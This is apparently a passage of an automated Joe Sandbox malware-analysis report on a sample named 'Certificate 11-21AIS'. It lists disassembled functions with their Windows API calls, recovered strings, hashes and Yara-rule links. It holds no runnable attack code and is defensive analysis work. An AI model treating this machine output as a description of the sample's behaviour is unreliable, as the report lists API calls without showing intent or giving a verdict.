                                                                              • Instruction ID: 7a61d38ca59fcf62ec06875ae2133b3a2328ed3eb480e5c65eb0713805496bd9
                                                                              • Opcode Fuzzy Hash: 138d77c0f6f119e97d468b922c57448c833971d62d631cfd630b0a61375ddde5
                                                                              • Instruction Fuzzy Hash: 7E613A76108300AFC711EF64DC85E9BBBF8FF89714F004A2EF595921A1DB709A09CB52
                                                                              Function 0090AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0090AB3D
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0090AB46
                                                                              • VariantClear.OLEAUT32(?), ref: 0090AB52
                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0090AC40
                                                                              • __swprintf.LIBCMT ref: 0090AC70
                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0090AC9C
                                                                              • VariantInit.OLEAUT32(?), ref: 0090AD4D
                                                                              • SysFreeString.OLEAUT32(00000016), ref: 0090ADDF
                                                                              • VariantClear.OLEAUT32(?), ref: 0090AE35
                                                                              • VariantClear.OLEAUT32(?), ref: 0090AE44
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0090AE80
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                              • API String ID: 3730832054-3931177956
                                                                              • Opcode ID: 1b1f4a1e74e53077a7c51111e05cc0fa9b92ff0696f30b8de6e118728124dbfc
                                                                              • Instruction ID: dd465b6d647bb6e503a6e0e7aff3f0bc7d373b6b0d748be787381e45256be831
                                                                              • Opcode Fuzzy Hash: 1b1f4a1e74e53077a7c51111e05cc0fa9b92ff0696f30b8de6e118728124dbfc
                                                                              • Instruction Fuzzy Hash: A7D1BE71A04315DFDB209F69C885B6AB7B9FF05B00F148965E4059B2D1DB78EC80EBE2
                                                                              Function 0092716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 009271FC
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00927247
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharMessageSendUpper
                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                              • API String ID: 3974292440-4258414348
                                                                              • Opcode ID: b0f3225e41d23ca0aed7650f0a1db9452ce4bb74c68f8c716094aad14aaa2130
                                                                              • Instruction ID: b16a182c101f83db579a548d409b09beb39e3e69f6307677b2066df06b6b5f18
                                                                              • Opcode Fuzzy Hash: b0f3225e41d23ca0aed7650f0a1db9452ce4bb74c68f8c716094aad14aaa2130
                                                                              • Instruction Fuzzy Hash: CA914C342087159BCA04EF68D451A6AF7A5FF94310F00495DF996AB3A7DB34ED0ACB82
                                                                              Function 0092E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0092E5AB
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00929808,?), ref: 0092E607
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0092E647
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0092E68C
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0092E6C3
                                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,00929808,?), ref: 0092E6CF
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0092E6DF
                                                                              • DestroyIcon.USER32(?), ref: 0092E6EE
                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0092E70B
                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0092E717
                                                                                • Part of subcall function 008E0FA7: __wcsicmp_l.LIBCMT ref: 008E1030
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                              • String ID: .dll$.exe$.icl
                                                                              • API String ID: 1212759294-1154884017
                                                                              • Opcode ID: 989b998a05688fc1f2d5653f190e0f7fa2d1ad14964467b8bbf8a23cb225d9a3
                                                                              • Instruction ID: f5abc40d3aa096254e4e608fef9c0ef8f6722a120fbb744179889639ec8d0053
                                                                              • Opcode Fuzzy Hash: 989b998a05688fc1f2d5653f190e0f7fa2d1ad14964467b8bbf8a23cb225d9a3
                                                                              • Instruction Fuzzy Hash: AC61F071510229BAEB24DF68DC86FBE7BACFB19714F104505F915D61D0EBB4E980CBA0
                                                                              Function 0090D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • CharLowerBuffW.USER32(?,?), ref: 0090D292
                                                                              • GetDriveTypeW.KERNEL32 ref: 0090D2DF
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D327
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D35E
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D38C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                              • API String ID: 1148790751-4113822522
                                                                              • Opcode ID: 4b4aca122276adce4efb3ab1edfafba1474b56b00345a3c4ae5e3a750b346b9f
                                                                              • Instruction ID: 7bdf4fcbe5467b412431b2a571ba3e4f778043b181f8d12131e3767e2ca71b82
                                                                              • Opcode Fuzzy Hash: 4b4aca122276adce4efb3ab1edfafba1474b56b00345a3c4ae5e3a750b346b9f
                                                                              • Instruction Fuzzy Hash: B15118751142059FC704EF28C882E6AB7F8FF98758F04896DF899A7291DB31EE05CB52
                                                                              Function 009026BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00933973,00000016,0000138C,00000016,?,00000016,0095DDB4,00000000,?), ref: 009026F1
                                                                              • LoadStringW.USER32(00000000,?,00933973,00000016), ref: 009026FA
                                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00933973,00000016,0000138C,00000016,?,00000016,0095DDB4,00000000,?,00000016), ref: 0090271C
                                                                              • LoadStringW.USER32(00000000,?,00933973,00000016), ref: 0090271F
                                                                              • __swprintf.LIBCMT ref: 0090276F
                                                                              • __swprintf.LIBCMT ref: 00902780
                                                                              • _wprintf.LIBCMT ref: 00902829
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00902840
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                              • API String ID: 618562835-2268648507
                                                                              • Opcode ID: a850d47d5784ee7b5e21c490788980cc5c5a299862facd638dc200459ff21925
                                                                              • Instruction ID: aed21cc2620a9b898b283e6f0d27b6cd1e7bc9d870a79a130c545863d7d6febf
                                                                              • Opcode Fuzzy Hash: a850d47d5784ee7b5e21c490788980cc5c5a299862facd638dc200459ff21925
                                                                              • Instruction Fuzzy Hash: A6413072800219AACF14FBD4DD8AEEEB778FF55344F504069F505B2092EA34AF49DB62
                                                                              Function 0090D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0090D0D8
                                                                              • __swprintf.LIBCMT ref: 0090D0FA
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0090D137
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0090D15C
                                                                              • _memset.LIBCMT ref: 0090D17B
                                                                              • _wcsncpy.LIBCMT ref: 0090D1B7
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0090D1EC
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0090D1F7
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0090D200
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0090D20A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 2733774712-3457252023
                                                                              • Opcode ID: cb12511301bd81949b8bff7e440985a0fa994a431847465fe860b8c9e41c7f83
                                                                              • Instruction ID: c68aaa010d593c3eb8292725f863e51d5ef71ecc95fb01cbf227047e502b48fd
                                                                              • Opcode Fuzzy Hash: cb12511301bd81949b8bff7e440985a0fa994a431847465fe860b8c9e41c7f83
                                                                              • Instruction Fuzzy Hash: 3531C1BA515109ABDB21DFA4CC48FEF37BCEF8A704F1040B6F519D21A1EB7096449B25
                                                                              Function 008F87CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                              • String ID:
                                                                              • API String ID: 884005220-0
                                                                              • Opcode ID: c366eeca6c7fe0dc3c908e36ee2a676ae530df49cf5de977739489798d160af2
                                                                              • Instruction ID: 75372771f485f5ed7f31a1c650c13536a851cac54f13f8415295dce41e9cb35d
                                                                              • Opcode Fuzzy Hash: c366eeca6c7fe0dc3c908e36ee2a676ae530df49cf5de977739489798d160af2
                                                                              • Instruction Fuzzy Hash: 2961E132A14219EFDB21AF39DC467793BA4FF117A4F200125EA15EB281EF74CD408B96
                                                                              Function 0092E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0092E754
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0092E76B
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0092E776
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0092E783
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0092E78C
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0092E79B
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0092E7A4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0092E7AB
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0092E7BC
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0094D9BC,?), ref: 0092E7D5
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0092E7E5
                                                                              • GetObjectW.GDI32(?,00000018,000000FF), ref: 0092E809
                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0092E834
                                                                              • DeleteObject.GDI32(00000000), ref: 0092E85C
                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0092E872
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                              • String ID:
                                                                              • API String ID: 3840717409-0
                                                                              • Opcode ID: 21f1c1a3aff677bf436d67badd95215302019431147c304290016e65c7b4de84
                                                                              • Instruction ID: 2922effea24d2951d4542b3c5bcb718686ae90538b1d942d6e17f376ca745336
                                                                              • Opcode Fuzzy Hash: 21f1c1a3aff677bf436d67badd95215302019431147c304290016e65c7b4de84
                                                                              • Instruction Fuzzy Hash: 30414979611214EFDB119F65DC88EAA7BBCEF8AB15F108058F916D7260C7709D40EB60
                                                                              Function 009105F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __wsplitpath.LIBCMT ref: 0091076F
                                                                              • _wcscat.LIBCMT ref: 00910787
                                                                              • _wcscat.LIBCMT ref: 00910799
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009107AE
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009107C2
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 009107DA
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 009107F4
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00910806
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                              • String ID: *.*
                                                                              • API String ID: 34673085-438819550
                                                                              • Opcode ID: 6cde16be3219616e6ed63800d86545866df453083fe4a965b52a4763f4c8d126
                                                                              • Instruction ID: 0bf115768106ee290b2dabc8abbdd4d0f339cd9e0810cf33435afe77c3de510a
                                                                              • Opcode Fuzzy Hash: 6cde16be3219616e6ed63800d86545866df453083fe4a965b52a4763f4c8d126
                                                                              • Instruction Fuzzy Hash: 8A81A1716083499FCB20DF28C8459AEB7E8FBC9344F148D2EF885C7250EA76D9D48B52
                                                                              Function 0092EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0092EF3B
                                                                              • GetFocus.USER32 ref: 0092EF4B
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0092EF56
                                                                              • _memset.LIBCMT ref: 0092F081
                                                                              • GetMenuItemInfoW.USER32 ref: 0092F0AC
                                                                              • GetMenuItemCount.USER32(00000000), ref: 0092F0CC
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0092F0DF
                                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0092F113
                                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0092F15B
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0092F193
                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0092F1C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1296962147-4108050209
                                                                              • Opcode ID: a2b5392be305809c504e38bbf7fdfb1645ba6815774b42c21d9af2951f9589e9
                                                                              • Instruction ID: f45d03c5037d760c06615bd2839e26aa011b819553143ef5b3b6f1f6908eebb0
                                                                              • Opcode Fuzzy Hash: a2b5392be305809c504e38bbf7fdfb1645ba6815774b42c21d9af2951f9589e9
                                                                              • Instruction Fuzzy Hash: 9E819C74509321AFD720DF14E894A6BBBF8FB88314F00093EF99897296D730D815CB92
                                                                              Function 008FA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 008FABD7
                                                                                • Part of subcall function 008FABBB: GetLastError.KERNEL32(?,008FA69F,?,?,?), ref: 008FABE1
                                                                                • Part of subcall function 008FABBB: GetProcessHeap.KERNEL32(00000008,?,?,008FA69F,?,?,?), ref: 008FABF0
                                                                                • Part of subcall function 008FABBB: HeapAlloc.KERNEL32(00000000,?,008FA69F,?,?,?), ref: 008FABF7
                                                                                • Part of subcall function 008FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 008FAC0E
                                                                                • Part of subcall function 008FAC56: GetProcessHeap.KERNEL32(00000008,008FA6B5,00000000,00000000,?,008FA6B5,?), ref: 008FAC62
                                                                                • Part of subcall function 008FAC56: HeapAlloc.KERNEL32(00000000,?,008FA6B5,?), ref: 008FAC69
                                                                                • Part of subcall function 008FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008FA6B5,?), ref: 008FAC7A
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008FA8CB
                                                                              • _memset.LIBCMT ref: 008FA8E0
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008FA8FF
                                                                              • GetLengthSid.ADVAPI32(?), ref: 008FA910
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 008FA94D
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008FA969
                                                                              • GetLengthSid.ADVAPI32(?), ref: 008FA986
                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008FA995
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 008FA99C
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008FA9BD
                                                                              • CopySid.ADVAPI32(00000000), ref: 008FA9C4
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008FA9F5
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008FAA1B
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008FAA2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3996160137-0
                                                                              • Opcode ID: 46eb0f3ebc0613040aeb73fe7c9c04cec7feb0bdd59891db25402de6c0ffd03e
                                                                              • Instruction ID: 38db8fe83eb7c9ebe6e293f683673ddc8d6625782cb5b98b41c93797960da0b5
                                                                              • Opcode Fuzzy Hash: 46eb0f3ebc0613040aeb73fe7c9c04cec7feb0bdd59891db25402de6c0ffd03e
                                                                              • Instruction Fuzzy Hash: AC514BB9900219ABDF18CFA4DC44EFEBBB9FF05310F048129EA15E7290D7319A05DB61
                                                                              Function 00919DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00919E36
                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00919E42
                                                                              • CreateCompatibleDC.GDI32(?), ref: 00919E4E
                                                                              • SelectObject.GDI32(00000000,?), ref: 00919E5B
                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00919EAF
                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00919EEB
                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00919F0F
                                                                              • SelectObject.GDI32(00000006,?), ref: 00919F17
                                                                              • DeleteObject.GDI32(?), ref: 00919F20
                                                                              • DeleteDC.GDI32(00000006), ref: 00919F27
                                                                              • ReleaseDC.USER32(00000000,?), ref: 00919F32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
